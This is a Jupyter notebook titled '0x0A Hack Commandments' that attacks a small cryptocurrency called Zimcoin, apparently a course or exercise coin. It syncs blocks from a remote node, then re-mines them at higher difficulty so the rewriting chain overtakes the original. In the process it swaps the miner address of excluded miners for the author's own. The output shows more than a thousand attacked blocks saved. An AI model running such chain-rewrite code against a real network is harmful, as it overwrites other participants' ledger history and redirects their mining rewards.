# 0x0A Hack Commandments

In [19]:
import math
from tqdm.notebook import tqdm
from sqlitedict import SqliteDict
from zimcoin_miner import ZimcoinMiner
from blocks import Block
from blocks import mine_block
from persistence import Persistence, dict_to_block
from node import Node
from connections import run_server, remote_connection

In [20]:
MINER_ADDRESS = bytes.fromhex('501ace0000000000000000000000000000000000')

## Test Persistance

In [21]:
file_name = "0x00_test.sqlite"
persistence = Persistence.start(file_name).proxy()

### Save a test block

In [22]:
height = 0
previous_block = bytes.fromhex('0000000000000000000000000000000000000000000000000000000000000000')
timestamp=1659431332

# mine a blocks
for index in range(2):
    # mine the block
    block = mine_block(
        previous= previous_block,
        height=height,
        miner=MINER_ADDRESS,
        transactions=[],
        timestamp=1659431332,
        difficulty=1000000000)

    # save the block
    persistence.save_block(block).get()

    # get ready for the next block
    height += 1
    previous_block = block.block_id
    timestamp += 120

*** Mining: miner=501ace0000000000000000000000000000000000, difficulty=1000000000, device=NVIDIA GeForce RTX 3060
**** Starting Iteration
*** Found block nonce: 2257457415, block_id: 0000000376f8c7c33d7e2925629af5a021478449dec0195ce0d96a57c74dcf2f
*** Mining: miner=501ace0000000000000000000000000000000000, difficulty=1000000000, device=NVIDIA GeForce RTX 3060
**** Starting Iteration
*** Found block nonce: 2618488949, block_id: 00000001efdbbc038b4a26cf83a5a158898fd2f181ad929fc726afbb1362fe57


### Get Persistance Blocks

In [23]:
blocks = persistence.get_blocks().get()
for block in blocks:
    print(block.block_id.hex())

0000000376f8c7c33d7e2925629af5a021478449dec0195ce0d96a57c74dcf2f
00000001efdbbc038b4a26cf83a5a158898fd2f181ad929fc726afbb1362fe57


## Remote Connection

In [24]:
REMOTE_NODES = ["ws://node.zimcoin.org:46030/"]
node = Node.start("./0x00_connecting.sqlite").proxy()
for remote in REMOTE_NODES:
    remote_connection(node, remote)


In [25]:
persistence = Persistence.start('./0x00_connecting.sqlite').proxy()
blocks = persistence.get_blocks().get()
for block in blocks:
    print(block.height, block.block_id.hex())

0 001752953780439af7ad106e1aea94b1f855cad279868d65bbb590071385d9c2
1 003551ec52bfbf104bbc8626e4a9cd5aa487f1e3206f78032a7cee9d3d798abc
2 00071decb5eaff91ebe8652d6a55d2d15c6a13d3ebffc69ceba793c0a8573258
3 00210165f5fe47a4bbad0d2628258181ee220934e45dd2173496e9a67aa7d63a
4 002a8da3c2fff826a15a0c53adc126d80c387edac1315caf69f0a79554fbfe82
5 00375b3349733c09fa132a771229ef7aa263975277c5326bcaa6c7b11e8d6795
6 000d37e908dbc6ad3d72afc4b8679cad9aa06f862faf104b5f68329ba546726a
7 002ca379660f5d780fed5de13b34d1b0e6b785efaf1047e1c5b940ea26169df7
8 003fbfa31f3a5bc2da482629e0eab2a4933bde97ba72c701dac4adc0ace3d946
9 001d9eeb153cb9a492b7c2e273b0e95a615ca05b9f5861b0e1acf6a1243be198
10 003e42ac27f436e578f1a896d0d28985632dc27348bc3319b7b280d6a90876f1
11 00000c7210bd8f48ac411d37688ec3558790ab12c369a137f48fec45d0a36369
12 00000016c20f6b7aab887f2b8ef56da45a5392289dda802db331dd52f60bd7de
13 00000098faaf47ac1c3096e733f148e776af90ba675863f27622d7474f8a2fc3
14 00000254900cbbf4e5c6a95623479d6f0f0bfa2ea5bfdfab5d02c42

In [26]:
exclude_list = [
    bytes.fromhex('fe45ad6d493c6ed34fa321f02d30e65479b9faa6'),
    bytes.fromhex('faac0ffe45ad6d493c6ed34fa321f02d30e65479'),
    bytes.fromhex('fe45ad6d493c6ed34fa321f02d30e65479b9faaa'),
    bytes.fromhex('0000000000000000000000000000000000000000')
]


def get_target_blocks(start_height : int,
                      file_name : str) -> list:
    """
    Get a list of the blocks to attack.
    """
    attack_blocks = []
    blocks = Persistence.start(file_name).proxy().get_blocks().get()

    for block in tqdm(blocks, 'Getting target attack blocks'):
        if block.height >= start_height:
            attack_blocks.append(block)

    return attack_blocks

def attack_blocks(difficulty : int,
                  attack_blocks : list,
                  exclude_list : list,
                  attack_persistence : Persistence) -> None:
    """
    Attack the blocks and replace the miner address of miners in the 
    exclude list.
    """
    # create tme miner
    block_miner = ZimcoinMiner(
        platform_id=0,
        device_id=0,
        window_size=1e5)

    for block in tqdm(attack_blocks, 'Attacking blocks'):
        # determine the miner address to replace
        miner = block.miner if block.miner not in exclude_list else MINER_ADDRESS

        # mine the attacked block
        attacked_block = block_miner.mine(
            previous = block.previous,
            height = block.height,
            miner = miner,
            transactions = block.transactions,
            timestamp = block.timestamp,
            difficulty = difficulty)

        # save the attacked block
        print("Saving block", attacked_block.block_id.hex())
        attack_persistence.save_block(attacked_block)
        
# get the blocks to attack blocks
#start_height = 1638
start_height = 2983
block_list = get_target_blocks(start_height, './0x00_connecting.sqlite')
print(f'Attack Block Count : {len(block_list)}')

# calculate the difficulty
difficulty = 0
for block in block_list:
    difficulty += block.difficulty

difficulty /= len(block_list)
target_difficulty = math.ceil(difficulty) + 10
print(f'Average Difficulty : {difficulty}')
print(f'Target Difficulty  : {target_difficulty}')

# overwrite difficulty (this is for later updates)
target_difficulty = 145507014

# create a database for the output
attack_file_name = "./0x01_attack.sqlite"
# attack the blocks
attack_blocks(
    difficulty=target_difficulty, 
    attack_blocks=block_list, 
    exclude_list=exclude_list,
    attack_persistence=Persistence.start(attack_file_name).proxy())


Getting target attack blocks:   0%|          | 0/2986 [00:00<?, ?it/s]

Attack Block Count : 3
Average Difficulty : 35837520.0
Target Difficulty  : 35837530


Attacking blocks:   0%|          | 0/3 [00:00<?, ?it/s]

*** Mining: miner=9b1164c83af4dde8a38898bac79397403864411b, difficulty=145507014, device=NVIDIA GeForce RTX 3060
**** Starting Iteration
*** Found block nonce: 2255555795, block_id: 0000000a7fea677a8eb7e75de41e4a517ff604511f05270fef7e92c892b93c0f
Saving block 0000000a7fea677a8eb7e75de41e4a517ff604511f05270fef7e92c892b93c0f
*** Mining: miner=9b1164c83af4dde8a38898bac79397403864411b, difficulty=145507014, device=NVIDIA GeForce RTX 3060
**** Starting Iteration
*** Found block nonce: 2418037591, block_id: 0000000955a41020c704b4b289b287fb23c723022be916ff034b6eab3b79cce0
Saving block 0000000955a41020c704b4b289b287fb23c723022be916ff034b6eab3b79cce0
*** Mining: miner=9b1164c83af4dde8a38898bac79397403864411b, difficulty=145507014, device=NVIDIA GeForce RTX 3060
**** Starting Iteration
*** Found block nonce: 2851792448, block_id: 0000001772e7453c4a1d2992fe7194b44a739bfbbd5c3cd3c5ea834879a927ba
Saving block 0000001772e7453c4a1d2992fe7194b44a739bfbbd5c3cd3c5ea834879a927ba


In [27]:
height = 1638
attacked_blocks = []
db = SqliteDict('./0x01_attack.sqlite', autocommit=True)
while True:
    block_dict = db.get(height)
    if block_dict is None:
        break
    attacked_blocks.append(dict_to_block(block_dict))
    height += 1

print(f'Attacked Block Count : {len(attacked_blocks)}')
print(f'First block difficulty : {attacked_blocks[0].difficulty}')
print(f'Last block height : {attacked_blocks[-1].height}')

# persistence = Persistence.start().proxy()
# blocks = persistence.get_blocks().get()
# for block in blocks:
#     print(block.height, block.block_id.hex())

Attacked Block Count : 1348
First block difficulty : 145507014
Last block height : 2985


## Lets do A LOT

In [28]:
# # create the database
# file_name = "0x01_boot.sqlite"
# persistence = Persistence.start(file_name).proxy()

# # set the genesis block
# height = 2646
# previous_block = bytes.fromhex('0000003c92b26061a6ee09a8b481f23cfb1d318b168f5529f8af469c33179cac')
# timestamp=1659821466

# # mine some blocks
# n = 1000
# for index in tqdm(range(n)):
#     block = mine_block(
#         previous= previous_block,
#         height=height,
#         miner=MINER_ADDRESS,
#         transactions=[],
#         timestamp=timestamp,
#         difficulty=42350000)

#     # save the blockr
#     persistence.save_block(block)

#     # get ready for the next block
#     height += 1
#     previous_block = block.block_id
#     timestamp += 120

In [29]:
# # create the database
# file_name = "0x01_boot.sqlite"
# persistence = Persistence.start(file_name).proxy()

# # set the genesis block
# height = 0
# previous_block = bytes.fromhex('0000000000000000000000000000000000000000000000000000000000000000')
# timestamp=1659431332

# # mine some blocks
# n = 4500
# for index in tqdm(range(n)):
#     block = mine_block(
#         previous= previous_block,
#         height=height,
#         miner=MINER_ADDRESS,
#         transactions=[],
#         timestamp=timestamp,
#         difficulty=1000000000)

#     # save the blockr
#     persistence.save_block(block)

#     # get ready for the next block
#     height += 1
#     previous_block = block.block_id
#     timestamp += 120